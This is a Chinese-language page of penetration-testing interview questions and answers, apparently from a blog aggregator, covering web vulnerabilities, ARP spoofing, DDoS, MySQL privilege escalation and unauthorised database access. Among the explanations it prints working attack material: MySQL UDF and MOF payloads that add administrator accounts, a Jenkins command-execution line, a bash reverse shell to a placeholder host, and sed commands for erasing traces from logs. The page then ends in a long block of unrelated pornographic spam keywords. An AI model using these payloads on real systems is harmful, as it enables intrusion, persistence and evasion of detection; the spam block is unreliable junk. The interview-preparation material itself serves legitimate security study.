    正常情況下,一個(gè)是產(chǎn)生XSS點(diǎn)的頁面不屬于self頁面,用戶之間產(chǎn)生交互行為的頁面,都可能造成XSS Worm的產(chǎn)生。 不一定需要存儲型XSS

    CSRF

    CSRF原理

    CSRF是跨站請求偽造攻擊,由客戶端發(fā)起,是由于沒有在關(guān)鍵操作執(zhí)行時(shí)進(jìn)行是否由用戶自愿發(fā)起的確認(rèn)

    防御

    驗(yàn)證Referer 添加token

    token和referer做橫向?qū)Ρ?#xff0c;誰安全等級高?

    token安全等級更高,因?yàn)椴⒉皇侨魏畏?wù)器都可以取得referer,如果從HTTPS跳到HTTP,也不會發(fā)送referer。并且FLASH一些版本中可以自定義referer。但是token的話,要保證其足夠隨機(jī)且不可泄露。(不可預(yù)測性原則)

    對referer的驗(yàn)證,從什么角度去做?如果做,怎么杜絕問題

    對header中的referer的驗(yàn)證,一個(gè)是空referer,一個(gè)是referer過濾或者檢測不完善。為了杜絕這種問題,在驗(yàn)證的白名單中,正則規(guī)則應(yīng)當(dāng)寫完善。

    針對token,對token測試會注意哪方面內(nèi)容,會對token的哪方面進(jìn)行測試?

    引用一段請教前輩的回答:

    針對token的攻擊,一是對它本身的攻擊,重放測試一次性、分析加密規(guī)則、校驗(yàn)方式是否正確等,二是結(jié)合信息泄露漏洞對它的獲取,結(jié)合著發(fā)起組合攻擊 信息泄露有可能是緩存、日志、get,也有可能是利用跨站 很多跳轉(zhuǎn)登錄的都依賴token,有一個(gè)跳轉(zhuǎn)漏洞加反射型跨站就可以組合成登錄劫持了 另外也可以結(jié)合著其它業(yè)務(wù)來描述token的安全性及設(shè)計(jì)不好怎么被繞過比如搶紅包業(yè)務(wù)之類的

    SSRF

    SSRF(Server-Side Request Forgery:服務(wù)器端請求偽造) 是一種由攻擊者構(gòu)造形成由服務(wù)端發(fā)起請求的一個(gè)安全漏洞。一般情況下,SSRF攻擊的目標(biāo)是從外網(wǎng)無法訪問的內(nèi)部系統(tǒng)。(正是因?yàn)樗怯煞?wù)端發(fā)起的,所以它能夠請求到與它相連而與外網(wǎng)隔離的內(nèi)部系統(tǒng))

    SSRF 形成的原因大都是由于服務(wù)端提供了從其他服務(wù)器應(yīng)用獲取數(shù)據(jù)的功能且沒有對目標(biāo)地址做過濾與限制。比如從指定URL地址獲取網(wǎng)頁文本內(nèi)容,加載指定地址的圖片,下載等等。

    檢測

    SSRF漏洞的驗(yàn)證方法:

    1)因?yàn)镾SRF漏洞是讓服務(wù)器發(fā)送請求的安全漏洞,所以我們就可以通過抓包分析發(fā)送的請求是否是由服務(wù)器的發(fā)送的,從而來判斷是否存在SSRF漏洞

    2)在頁面源碼中查找訪問的資源地址 ,如果該資源地址類型為 www.baidu.com/xxx.php?image=(地址)的就可能存在SSRF漏洞 4[1]

    SSRF漏洞的成因 防御 繞過

    成因:模擬服務(wù)器對其他服務(wù)器資源進(jìn)行請求,沒有做合法性驗(yàn)證。利用:構(gòu)造惡意內(nèi)網(wǎng)IP做探測,或者使用其余所支持的協(xié)議對其余服務(wù)進(jìn)行攻擊。防御:禁止跳轉(zhuǎn),限制協(xié)議,內(nèi)外網(wǎng)限制,URL限制。繞過:使用不同協(xié)議,針對IP,IP格式的繞過,針對URL,惡意URL增添其他字符,@之類的。301跳轉(zhuǎn)+dns rebindding。

    上傳

    文件上傳漏洞原理

    由于程序員在對用戶文件上傳部分的控制不足或者處理缺陷,而導(dǎo)致用戶可以越過其本身權(quán)限向服務(wù)器上傳可執(zhí)行的動(dòng)態(tài)腳本文件

    常見的上傳繞過方式

    前端js驗(yàn)證:禁用js/burp改包 大小寫 雙重后綴名 過濾繞過 pphphp->php

    防護(hù)

    文件上傳目錄設(shè)置為不可執(zhí)行 使用白名單判斷文件上傳類型 用隨機(jī)數(shù)改寫文件名和路徑

    審查上傳點(diǎn)的元素有什么意義?

    有些站點(diǎn)的上傳文件類型的限制是在前端實(shí)現(xiàn)的,這時(shí)只要增加上傳類型就能突破限制了。

    文件包含

    原理

    引入一段用戶能控制的腳本或代碼,并讓服務(wù)器端執(zhí)行 include()等函數(shù)通過動(dòng)態(tài)變量的方式引入需要包含的文件; 用戶能夠控制該動(dòng)態(tài)變量。

    導(dǎo)致文件包含的函數(shù)

    PHP:include(), include_once(), require(), re-quire_once(), fopen(), readfile(), … JSP/Servlet:ava.io.File(), java.io.Fil-eReader(), … ASP:include file, include virtual,

    本地文件包含

    能夠打開并包含本地文件的漏洞,被稱為本地文件包含漏洞

    金融行業(yè)常見邏輯漏洞

    單針對金融業(yè)務(wù)的 主要是數(shù)據(jù)的篡改(涉及金融數(shù)據(jù),或部分業(yè)務(wù)的判斷數(shù)據(jù)),由競爭條件或者設(shè)計(jì)不當(dāng)引起的薅羊毛,交易/訂單信息泄露,水平越權(quán)對別人的賬戶查看或惡意操作,交易或業(yè)務(wù)步驟繞過。

    中間人攻擊

    中間人攻擊是一個(gè)(缺乏)相互認(rèn)證的攻擊;由于客戶端與服務(wù)器之間在SSL握手的過程中缺乏相互認(rèn)證而造成的漏洞

    防御中間人攻擊的方案通常基于一下幾種技術(shù)

    1.公鑰基礎(chǔ)建設(shè)PKI 使用PKI相互認(rèn)證機(jī)制,客戶端驗(yàn)證服務(wù)器,服務(wù)器驗(yàn)證客戶端;上述兩個(gè)例子中都是只驗(yàn)證服務(wù)器,這樣就造成了SSL握手環(huán)節(jié)的漏洞,而如果使用相互認(rèn)證的的話,基本可以更強(qiáng)力的相互認(rèn)證

    2.延遲測試

    使用復(fù)雜加密哈希函數(shù)進(jìn)行計(jì)算以造成數(shù)十秒的延遲;如果雙方通常情況下都要花費(fèi)20秒來計(jì)算,并且整個(gè)通訊花費(fèi)了60秒計(jì)算才到達(dá)對方,這就能表明存在第三方中間人。

    3.使用其他形式的密鑰交換形式

    ARP欺騙

    原理

    每臺主機(jī)都有一個(gè)ARP緩存表,緩存表中記錄了IP地址與MAC地址的對應(yīng)關(guān)系,而局域網(wǎng)數(shù)據(jù)傳輸依靠的是MAC地址。在ARP緩存表機(jī)制存在一個(gè)缺陷,就是當(dāng)請求主機(jī)收到ARP應(yīng)答包后,不會去驗(yàn)證自己是否向?qū)Ψ街鳈C(jī)發(fā)送過ARP請求包,就直接把這個(gè)返回包中的IP地址與MAC地址的對應(yīng)關(guān)系保存進(jìn)ARP緩存表中,如果原有相同IP對應(yīng)關(guān)系,原有的則會被替換。這樣攻擊者就有了偷聽主機(jī)傳輸?shù)臄?shù)據(jù)的可能

    防護(hù)

    1.在主機(jī)綁定網(wǎng)關(guān)MAC與IP地址為靜態(tài)(默認(rèn)為動(dòng)態(tài)),命令:arp -s 網(wǎng)關(guān)IP 網(wǎng)關(guān)MAC

    2.在網(wǎng)關(guān)綁定主機(jī)MAC與IP地址

    3.使用ARP防火墻

    DDOS

    Ddos原理

    利用合理的請求造成資源過載,導(dǎo)致服務(wù)不可用

    syn洪流的原理

    偽造大量的源IP地址,分別向服務(wù)器端發(fā)送大量的SYN包,此時(shí)服務(wù)器端會返回SYN/ACK包,因?yàn)樵吹刂肥莻卧斓?#xff0c;所以偽造的IP并不會應(yīng)答,服務(wù)器端沒有收到偽造IP的回應(yīng),會重試3~5次并且等待一個(gè)SYNTime(一般為30秒至2分鐘),如果超時(shí)則丟棄這個(gè)連接。攻擊者大量發(fā)送這種偽造源地址的SYN請求,服務(wù)器端將會消耗非常多的資源(CPU和內(nèi)存)來處理這種半連接,同時(shí)還要不斷地對這些IP進(jìn)行SYN+ACK重試。最后的結(jié)果是服務(wù)器無暇理睬正常的連接請求,導(dǎo)致拒絕服務(wù)。

    CC攻擊原理

    對一些消耗資源較大的應(yīng)用頁面不斷發(fā)起正常的請求,以達(dá)到消耗服務(wù)端資源的目的。

    DDOS防護(hù)

    SYN Cookie/SYN Proxy、safereset等算法。SYN Cookie的主要思想是為每一個(gè)IP地址分配一個(gè)“Cookie”,并統(tǒng)計(jì)每個(gè)IP地址的訪問頻率。如果在短時(shí)間內(nèi)收到大量的來自同一個(gè)IP地址的數(shù)據(jù)包,則認(rèn)為受到攻擊,之后來自這個(gè)IP地址的包將被丟棄。

    提權(quán)

    mysql兩種提權(quán)方式

    udf提權(quán),mof提權(quán)

    Mysql_UDF提權(quán)

    要求: 1.目標(biāo)系統(tǒng)是Windows(Win2000,XP,Win2003);2.擁有MYSQL的某個(gè)用戶賬號,此賬號必須有對mysql的insert和delete權(quán)限以創(chuàng)建和拋棄函數(shù) 3.有root賬號密碼 導(dǎo)出udf: MYSQL 5.1以上版本,必須要把udf.dll文件放到MYSQL安裝目錄下的lib\plugin文件夾下才能創(chuàng)建自定義函數(shù) 可以再mysql里輸入select @@basedirshow variables like ‘%plugins%’ 尋找mysql安裝路徑 提權(quán):

    使用SQL語句創(chuàng)建功能函數(shù)。語法:Create Function 函數(shù)名(函數(shù)名只能為下面列表中的其中之一)returns string soname ‘導(dǎo)出的DLL路徑’;

    create function cmdshell returns string soname ‘udf.dll’ select cmdshell(‘net user arsch arsch /add’); select cmdshell(‘net localgroup administrators arsch /add’);drop function cmdshell;

    該目錄默認(rèn)是不存在的,這就需要我們使用webshell找到MYSQL的安裝目錄,并在安裝目錄下創(chuàng)建lib\plugin文件夾,然后將udf.dll文件導(dǎo)出到該目錄即可。

    Mysql mof提權(quán)

    #pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; };instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user waitalone waitalone.cn /add\")"; };instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };

    其中的第18行的命令,上傳前請自己更改。

    2、執(zhí)行l(wèi)oad_file及into dumpfile把文件導(dǎo)出到正確的位置即可。

    select load file('c:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mov'

    執(zhí)行成功后,即可添加一個(gè)普通用戶,然后你可以更改命令,再上傳導(dǎo)出執(zhí)行把用戶提升到管理員權(quán)限,然后3389連接之就ok了。

    特殊漏洞

    Struts2-045

    Redis未授權(quán)訪問

    產(chǎn)生原因

    Redis 默認(rèn)情況下,會綁定在 0.0.0.0:6379,這樣將會將 Redis 服務(wù)暴露到公網(wǎng)上,如果在沒有開啟認(rèn)證的情況下,可以導(dǎo)致任意用戶在可以訪問目標(biāo)服務(wù)器的情況下未授權(quán)訪問 Redis 以及讀取 Redis 的數(shù)據(jù)。攻擊者在未授權(quán)訪問 Redis 的情況下可以利用 Redis 的相關(guān)方法,可以成功在 Redis 服務(wù)器上寫入公鑰,進(jìn)而可以使用對應(yīng)私鑰直接登錄目標(biāo)服務(wù)器

    利用條件和方法

    條件:

    a、redis服務(wù)以root賬戶運(yùn)行 b、redis無密碼或弱密碼進(jìn)行認(rèn)證 c、redis監(jiān)聽在0.0.0.0公網(wǎng)上

    方法:

    a、通過 Redis 的 INFO 命令, 可以查看服務(wù)器相關(guān)的參數(shù)和敏感信息, 為攻擊者的后續(xù)滲透做鋪墊 b、上傳SSH公鑰獲得SSH登錄權(quán)限 c、通過crontab反彈shell d、slave主從模式利用

    修復(fù)

    密碼驗(yàn)證 降權(quán)運(yùn)行 限制ip/修改端口

    Jenkins未授權(quán)訪問

    攻擊者通過未授權(quán)訪問進(jìn)入腳本命令執(zhí)行界面執(zhí)行攻擊指令

    println "ifconfig -a".execute().text 執(zhí)行一些系統(tǒng)命令,利用wget下載webshell

    MongoDB未授權(quán)訪問

    開啟MongoDB服務(wù)時(shí)不添加任何參數(shù)時(shí),默認(rèn)是沒有權(quán)限驗(yàn)證的,而且可以遠(yuǎn)程訪問數(shù)據(jù)庫,登錄的用戶可以通過默認(rèn)端口無需密碼對數(shù)據(jù)庫進(jìn)行增、刪、改、查等任意高危操作。

    防護(hù)

    1、為MongoDB添加認(rèn)證:1)MongoDB啟動(dòng)時(shí)添加–auth參數(shù) 2)給MongoDB添加用戶:use admin #使用admin庫 db.addUser(“root”, “123456”) #添加用戶名root密碼123456的用戶 db.auth(“root”,“123456”) #驗(yàn)證下是否添加成功,返回1說明成功 2、禁用HTTP和REST端口 MongoDB自身帶有一個(gè)HTTP服務(wù)和并支持REST接口。在2.6以后這些接口默認(rèn)是關(guān)閉的。mongoDB默認(rèn)會使用默認(rèn)端口監(jiān)聽web服務(wù),一般不需要通過web方式進(jìn)行遠(yuǎn)程管理,建議禁用。修改配置文件或在啟動(dòng)的時(shí)候選擇–nohttpinterface 參數(shù)nohttpinterface=false 3、限制綁定IP 啟動(dòng)時(shí)加入?yún)?shù) –bind_ip 127.0.0.1 或在/etc/mongodb.conf文件中添加以下內(nèi)容:bind_ip = 127.0.0.1

    Memcache未授權(quán)訪問

    Memcached是一套常用的key-value緩存系統(tǒng),由于它本身沒有權(quán)限控制模塊,所以對公網(wǎng)開放的Memcache服務(wù)很容易被攻擊者掃描發(fā)現(xiàn),攻擊者通過命令交互可直接讀取Memcached中的敏感信息。

    利用

    1、登錄機(jī)器執(zhí)行netstat -an |more命令查看端口監(jiān)聽情況。回顯0.0.0.0:11211表示在所有網(wǎng)卡進(jìn)行監(jiān)聽,存在memcached未授權(quán)訪問漏洞。

    2、telnet 11211,或nc -vv 11211,提示連接成功表示漏洞存在

    漏洞加固

    a、設(shè)置memchached只允許本地訪問 b、禁止外網(wǎng)訪問Memcached 11211端口 c、編譯時(shí)加上–enable-sasl,啟用SASL認(rèn)證

    FFMPEG 本地文件讀取漏洞

    原理

    通過調(diào)用加密API將payload加密放入一個(gè)會被執(zhí)行的段字節(jié)中。但是具體回答工程中我只回答道了SSRF老洞,m3u8頭,偏移量,加密。

    安全知識

    WEB

    常用WEB開發(fā)JAVA框架

    STRUTS,SPRING 常見的java框架漏洞 其實(shí)面試官問這個(gè)問題的時(shí)候我不太清楚他要問什么,我提到struts的045 048,java常見反序列化。045 錯(cuò)誤處理引入了ognl表達(dá)式 048 封裝action的過程中有一步調(diào)用getstackvalue遞歸獲取ognl表達(dá)式 反序列化 操作對象,通過手段引入。apache common的反射機(jī)制、readobject的重寫,其實(shí)具體的我也記不清楚。。。然后這部分就結(jié)束了

    同源策略

    同源策略限制不同源對當(dāng)前document的屬性內(nèi)容進(jìn)行讀取或設(shè)置。不同源的區(qū)分:協(xié)議、域名、子域名、IP、端口,以上有不同時(shí)即不同源。

    Jsonp安全攻防技術(shù),怎么寫Jsonp的攻擊頁面?

    涉及到Jsonp的安全攻防內(nèi)容

    JSON劫持、Callback可定義、JSONP內(nèi)容可定義、Content-type不為json。

    攻擊頁面

    JSON劫持,跨域劫持敏感信息,頁面類似于

    function wooyun(v){ alert(v.username); } </script> <script src="http://js.login.360.cn/?o=sso&m=info&func=wooyun"></script>

    Content-type不正確情況下,JSONP和Callback內(nèi)容可定義可造成XSS。JSONP和FLASH及其他的利用參照知道創(chuàng)宇的JSONP安全攻防技術(shù)。

    PHP

    php中命令執(zhí)行涉及到的函數(shù)

    1,代碼執(zhí)行:eval()、assert()、popen()、system()、exec()、shell_exec()、passthru(),pcntl_exec(),call_user_func_array(),create_function() 2,文件讀取:file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等 3,命令執(zhí)行:system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

    安全模式下繞過php的disable fuction

    DL函數(shù),組件漏洞,環(huán)境變量。

    PHP弱類型

    == 在進(jìn)行比較的時(shí)候,會先將字符串類型轉(zhuǎn)化成相同,再比較

    如果比較一個(gè)數(shù)字和字符串或者比較涉及到數(shù)字內(nèi)容的字符串,則字符串會被轉(zhuǎn)換成數(shù)值并且比較按照數(shù)值來進(jìn)行

    0e開頭的字符串等于0

    數(shù)據(jù)庫

    各種數(shù)據(jù)庫文件存放的位置

    mysql:

    /usr/local/mysql/data/

    C:\ProgramData\MySQL\MySQL Server 5.6\Data\

    oracle:$ORACLE_BASE/oradata/$ORACLE_SID/

    系統(tǒng)

    如何清理日志

    meterpreter: clearev

    入侵 Linux 服務(wù)器后需要清除哪些日志?

    web日志,如apache的access.log,error.log。直接將日志清除過于明顯,一般使用sed進(jìn)行定向清除

    e.g. sed -i -e ‘/192.169.1.1/d’

    history命令的清除,也是對~/.bash_history進(jìn)行定向清除

    wtmp日志的清除,/var/log/wtmp

    登錄日志清除 /var/log/secure

    LINUX

    查看當(dāng)前端口連接的命令有哪些?netstat 和 ss 命令的區(qū)別和優(yōu)缺點(diǎn)

    netstat -antp` `ss -l

    ss的優(yōu)勢在于它能夠顯示更多更詳細(xì)的有關(guān)TCP和連接狀態(tài)的信息,而且比netstat更快速更高效。

    反彈 shell 的常用命令?一般常反彈哪一種 shell?為什么?

    bash -i>&/dev/tcp/x.x.x.x/4444 0>&1

    通過Linux系統(tǒng)的/proc目錄 ,能夠獲取到哪些信息,這些信息可以在安全上有哪些應(yīng)用?

    ls /proc

    系統(tǒng)信息,硬件信息,內(nèi)核版本,加載的模塊,進(jìn)程

    linux系統(tǒng)中,檢測哪些配置文件的配置項(xiàng),能夠提升SSH的安全性。

    /etc/ssh/sshd___configiptables配置

    如何一條命令查看文件內(nèi)容最后一百行

    tail -n 100 filename

    Windows

    如何加固一個(gè)域環(huán)境下的Windows桌面工作環(huán)境?請給出你的思路。

    密碼學(xué)

    AES/DES的具體工作步驟

    RSA算法

    加密:

    密文=明文^EmodN

    RSA加密是對明文的E次方后除以N后求余數(shù)的過程

    公鑰=(E,N)

    解密:

    明文=密文^DmodN私鑰=(D,N)

    三個(gè)參數(shù)n,e1,e2

    n是兩個(gè)大質(zhì)數(shù)p,q的積

    分組密碼的加密模式

    如何生成一個(gè)安全的隨機(jī)數(shù)?

    引用之前一個(gè)學(xué)長的答案,可以通過一些物理系統(tǒng)生成隨機(jī)數(shù),如電壓的波動(dòng)、磁盤磁頭讀/寫時(shí)的尋道時(shí)間、空中電磁波的噪聲等。

    SSL握手過程

    建立TCP連接、客戶端發(fā)送SSL請求、服務(wù)端處理SSL請求、客戶端發(fā)送公共密鑰加密過的隨機(jī)數(shù)據(jù)、服務(wù)端用私有密鑰解密加密后的隨機(jī)數(shù)據(jù)并協(xié)商暗號、服務(wù)端跟客戶端利用暗號生成加密算法跟密鑰key、之后正常通信。這部分本來是忘了的,但是之前看SSL Pinning的時(shí)候好像記了張圖在腦子里,掙扎半天還是沒敢確定,遂放棄。。。

    對稱加密與非對稱加密的不同,分別用在哪些方面

    TCP/IP

    TCP三次握手的過程以及對應(yīng)的狀態(tài)轉(zhuǎn)換

    (1)客戶端向服務(wù)器端發(fā)送一個(gè)SYN包,包含客戶端使用的端口號和初始序列號x; (2)服務(wù)器端收到客戶端發(fā)送來的SYN包后,向客戶端發(fā)送一個(gè)SYN和ACK都置位的TCP報(bào)文,包含確認(rèn)號xx1和服務(wù)器端的初始序列號y; (3)客戶端收到服務(wù)器端返回的SYNSACK報(bào)文后,向服務(wù)器端返回一個(gè)確認(rèn)號為yy1、序號為xx1的ACK報(bào)文,一個(gè)標(biāo)準(zhǔn)的TCP連接完成。

    TCP和UDP協(xié)議區(qū)別

    tcp面向連接,udp面向報(bào)文 tcp對系統(tǒng)資源的要求多 udp結(jié)構(gòu)簡單 tcp保證數(shù)據(jù)完整性和順序,udp不保證

    https的建立過程

    a、客戶端發(fā)送請求到服務(wù)器端 b、服務(wù)器端返回證書和公開密鑰,公開密鑰作為證書的一部分而存在 c、客戶端驗(yàn)證證書和公開密鑰的有效性,如果有效,則生成共享密鑰并使用公開密鑰加密發(fā)送到服務(wù)器端 d、服務(wù)器端使用私有密鑰解密數(shù)據(jù),并使用收到的共享密鑰加密數(shù)據(jù),發(fā)送到客戶端 e、客戶端使用共享密鑰解密數(shù)據(jù) f、SSL加密建立

    流量分析

    wireshark簡單的過濾規(guī)則

    過濾ip:

    過濾源ip地址:ip.src==1.1.1.1;,目的ip地址:ip.dst==1.1.1.1;

    過濾端口:

    過濾80端口:tcp.port==80,源端口:tcp.srcport==80,目的端口:tcp.dstport==80

    協(xié)議過濾:

    直接輸入?yún)f(xié)議名即可,如http協(xié)議http

    http模式過濾:

    過濾get/post包http.request.mothod=="GET/POST"

    給原作者一個(gè)贊哦。

    總結(jié)

    以上是生活随笔為你收集整理的渗透面试题的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

    国产sm调教视频在线观看 | 老司机亚洲精品影院无码 | 久久精品国产亚洲精品 | 欧美老妇交乱视频在线观看 | 亚洲综合无码久久精品综合 | 丁香啪啪综合成人亚洲 | 中文字幕久久久久人妻 | 在线播放无码字幕亚洲 | 狠狠cao日日穞夜夜穞av | 久激情内射婷内射蜜桃人妖 | 久久精品丝袜高跟鞋 | 无码av免费一区二区三区试看 | 精品国产麻豆免费人成网站 | 久久www免费人成人片 | 亚洲精品国偷拍自产在线麻豆 | 亚洲男人av天堂午夜在 | 国产激情无码一区二区app | 亚洲中文无码av永久不收费 | 老司机亚洲精品影院无码 | 免费无码一区二区三区蜜桃大 | 六月丁香婷婷色狠狠久久 | 精品日本一区二区三区在线观看 | 亚洲精品国产品国语在线观看 | 久久亚洲中文字幕无码 | 久久亚洲精品中文字幕无男同 | 久久精品国产一区二区三区肥胖 | 性做久久久久久久免费看 | 女人被男人爽到呻吟的视频 | 欧美国产日韩亚洲中文 | 国产极品美女高潮无套在线观看 | 免费乱码人妻系列无码专区 | 亚洲综合无码一区二区三区 | 初尝人妻少妇中文字幕 | 九九在线中文字幕无码 | 中文无码精品a∨在线观看不卡 | 亚洲国产精品一区二区第一页 | 亚洲欧洲日本无在线码 | 色综合久久88色综合天天 | 日韩人妻无码中文字幕视频 | 国产精品第一区揄拍无码 | 成人无码精品一区二区三区 | 波多野结衣乳巨码无在线观看 | 国产激情综合五月久久 | 又大又紧又粉嫩18p少妇 | 少妇性荡欲午夜性开放视频剧场 | 国产手机在线αⅴ片无码观看 | 国产免费久久精品国产传媒 | 美女张开腿让人桶 | 夜夜夜高潮夜夜爽夜夜爰爰 | 少妇无码av无码专区在线观看 | 国产精品毛片一区二区 | 亚洲日韩乱码中文无码蜜桃臀网站 | 久久久www成人免费毛片 | 在线欧美精品一区二区三区 | 狂野欧美性猛交免费视频 | 国产精品久久国产三级国 | 久久精品99久久香蕉国产色戒 | 成人欧美一区二区三区 | 日日噜噜噜噜夜夜爽亚洲精品 | 午夜肉伦伦影院 | 久久精品丝袜高跟鞋 | 亚洲性无码av中文字幕 | 欧美乱妇无乱码大黄a片 | 中文字幕av日韩精品一区二区 | 天天摸天天碰天天添 | 无套内谢的新婚少妇国语播放 | 少妇人妻大乳在线视频 | 51国偷自产一区二区三区 | 中文字幕中文有码在线 | 沈阳熟女露脸对白视频 | 久久久久成人精品免费播放动漫 | 中文字幕av无码一区二区三区电影 | 国产一区二区三区四区五区加勒比 | 亚洲国产精品成人久久蜜臀 | 国产一精品一av一免费 | 国产精品18久久久久久麻辣 | 午夜熟女插插xx免费视频 | 欧美野外疯狂做受xxxx高潮 | 欧美精品免费观看二区 | 久久久久人妻一区精品色欧美 | 又粗又大又硬又长又爽 | 久久天天躁夜夜躁狠狠 | 国产女主播喷水视频在线观看 | 青青久在线视频免费观看 | 国产亚av手机在线观看 | 精品人妻中文字幕有码在线 | 我要看www免费看插插视频 | 国产区女主播在线观看 | 人妻有码中文字幕在线 | 丰满岳乱妇在线观看中字无码 | 老熟妇乱子伦牲交视频 | 欧美日韩在线亚洲综合国产人 | 性欧美videos高清精品 | 真人与拘做受免费视频一 | 成年美女黄网站色大免费视频 | 全球成人中文在线 | 国产精品丝袜黑色高跟鞋 | 精品熟女少妇av免费观看 | 激情亚洲一区国产精品 | 国产精品无码久久av | 欧美精品国产综合久久 | 天天做天天爱天天爽综合网 | 97无码免费人妻超级碰碰夜夜 | 国内综合精品午夜久久资源 | 人人澡人人透人人爽 | 成人av无码一区二区三区 | 亚洲一区二区三区国产精华液 | 精品一区二区不卡无码av | 未满成年国产在线观看 | 人人妻人人澡人人爽人人精品 | 国产熟妇高潮叫床视频播放 | 久久久久亚洲精品男人的天堂 | 国产97色在线 | 免 | 国産精品久久久久久久 | 麻花豆传媒剧国产免费mv在线 | 成人片黄网站色大片免费观看 | 国产情侣作爱视频免费观看 | 精品一区二区三区无码免费视频 | 精品国产一区av天美传媒 | 99久久婷婷国产综合精品青草免费 | 四虎永久在线精品免费网址 | 国精产品一品二品国精品69xx | 四虎国产精品一区二区 | 亚洲精品中文字幕 | 99视频精品全部免费免费观看 | 亚洲国产成人a精品不卡在线 | 奇米综合四色77777久久 东京无码熟妇人妻av在线网址 | 牲欲强的熟妇农村老妇女 | 国产suv精品一区二区五 | 无码吃奶揉捏奶头高潮视频 | 天堂亚洲2017在线观看 | 亚洲午夜福利在线观看 | 俺去俺来也在线www色官网 | 理论片87福利理论电影 | 久久精品人妻少妇一区二区三区 | 免费人成在线观看网站 | 亚洲成a人片在线观看日本 | 日韩视频 中文字幕 视频一区 | 最近中文2019字幕第二页 | 四虎国产精品免费久久 | 日日碰狠狠躁久久躁蜜桃 | 久久视频在线观看精品 | 精品亚洲韩国一区二区三区 | 国产精品欧美成人 | 亚洲综合在线一区二区三区 | 国产美女极度色诱视频www | 精品无人国产偷自产在线 | а√天堂www在线天堂小说 | 狠狠色色综合网站 | 领导边摸边吃奶边做爽在线观看 | 内射爽无广熟女亚洲 | 亚洲七七久久桃花影院 | 一个人看的www免费视频在线观看 | 亚洲一区二区三区无码久久 | 亚洲欧洲日本综合aⅴ在线 | 亚洲va欧美va天堂v国产综合 | 中文字幕乱码亚洲无线三区 | 亚洲人成影院在线观看 | 久久天天躁狠狠躁夜夜免费观看 | 久久99精品久久久久婷婷 | 久久国产36精品色熟妇 | 大地资源中文第3页 | 免费国产黄网站在线观看 | 狠狠色丁香久久婷婷综合五月 | 人妻少妇精品久久 | 亚洲高清偷拍一区二区三区 | 在线天堂新版最新版在线8 | 99久久人妻精品免费二区 | 亚洲精品无码国产 | 76少妇精品导航 | 国产又爽又猛又粗的视频a片 | 欧美刺激性大交 | 无码国产色欲xxxxx视频 | 亚洲区欧美区综合区自拍区 | 老司机亚洲精品影院无码 | 国产成人无码专区 | 亚洲欧美中文字幕5发布 | 国产国语老龄妇女a片 | 丰满少妇弄高潮了www | 午夜福利一区二区三区在线观看 | 老熟妇乱子伦牲交视频 | 国产另类ts人妖一区二区 | 国产激情无码一区二区 | 成人精品天堂一区二区三区 | 人妻夜夜爽天天爽三区 | 97夜夜澡人人双人人人喊 | 天天拍夜夜添久久精品 | 强辱丰满人妻hd中文字幕 | 最近的中文字幕在线看视频 | 亚洲精品一区二区三区在线观看 | 精品久久久无码人妻字幂 | 少妇性l交大片欧洲热妇乱xxx | 撕开奶罩揉吮奶头视频 | 久久久久久av无码免费看大片 | 午夜精品一区二区三区的区别 | 精品久久久中文字幕人妻 | 丝袜 中出 制服 人妻 美腿 | 一本大道伊人av久久综合 | 久久久精品欧美一区二区免费 | 日韩人妻无码一区二区三区久久99 | 亚洲 日韩 欧美 成人 在线观看 | 亚洲成av人在线观看网址 | 草草网站影院白丝内射 | 亚欧洲精品在线视频免费观看 | 国产农村妇女aaaaa视频 撕开奶罩揉吮奶头视频 | 中文字幕 亚洲精品 第1页 | 久久人人爽人人爽人人片ⅴ | 国产真实夫妇视频 | 野外少妇愉情中文字幕 | 理论片87福利理论电影 | 国产亚洲日韩欧美另类第八页 | 欧美亚洲日韩国产人成在线播放 | 亚洲色偷偷偷综合网 | 欧美成人家庭影院 | 人妻中文无码久热丝袜 | 老司机亚洲精品影院无码 | 大肉大捧一进一出视频出来呀 | 亚洲国产精品无码一区二区三区 | 无遮挡啪啪摇乳动态图 | 无码人妻精品一区二区三区下载 | 成人精品视频一区二区 | 欧美放荡的少妇 | 亚洲欧洲中文日韩av乱码 | 欧美日韩亚洲国产精品 | 鲁一鲁av2019在线 | 久久 国产 尿 小便 嘘嘘 | 亚洲国产高清在线观看视频 | 国产亚洲精品久久久闺蜜 | 欧美国产日产一区二区 | 久久久精品欧美一区二区免费 | 亚洲综合伊人久久大杳蕉 | 网友自拍区视频精品 | 亚洲精品国产第一综合99久久 | 偷窥日本少妇撒尿chinese | 亚洲中文字幕久久无码 | 国产国产精品人在线视 | 国产一区二区三区影院 | 欧美日韩一区二区三区自拍 | 久久久久久久人妻无码中文字幕爆 | 亚洲日韩精品欧美一区二区 | 日本一卡2卡3卡四卡精品网站 | 亚洲国产精品久久久久久 | 精品乱子伦一区二区三区 | 久久久av男人的天堂 | 亚洲精品午夜无码电影网 | 亚洲国产欧美日韩精品一区二区三区 | 大乳丰满人妻中文字幕日本 | 精品aⅴ一区二区三区 | 久久精品丝袜高跟鞋 | 成人无码影片精品久久久 | 欧美自拍另类欧美综合图片区 | 国产凸凹视频一区二区 | 亚洲区小说区激情区图片区 | 色婷婷综合激情综在线播放 | 久久久中文字幕日本无吗 | 丰满少妇高潮惨叫视频 | 久久99精品久久久久久动态图 | 成人欧美一区二区三区 | 亚洲国产av精品一区二区蜜芽 | 丰腴饱满的极品熟妇 | 最近免费中文字幕中文高清百度 | 丰满少妇弄高潮了www | 亚洲色欲色欲天天天www | 又大又硬又黄的免费视频 | 精品成在人线av无码免费看 | √8天堂资源地址中文在线 | 粉嫩少妇内射浓精videos | 成人精品视频一区二区三区尤物 | 性做久久久久久久免费看 | 蜜臀aⅴ国产精品久久久国产老师 | 国产在线精品一区二区三区直播 | 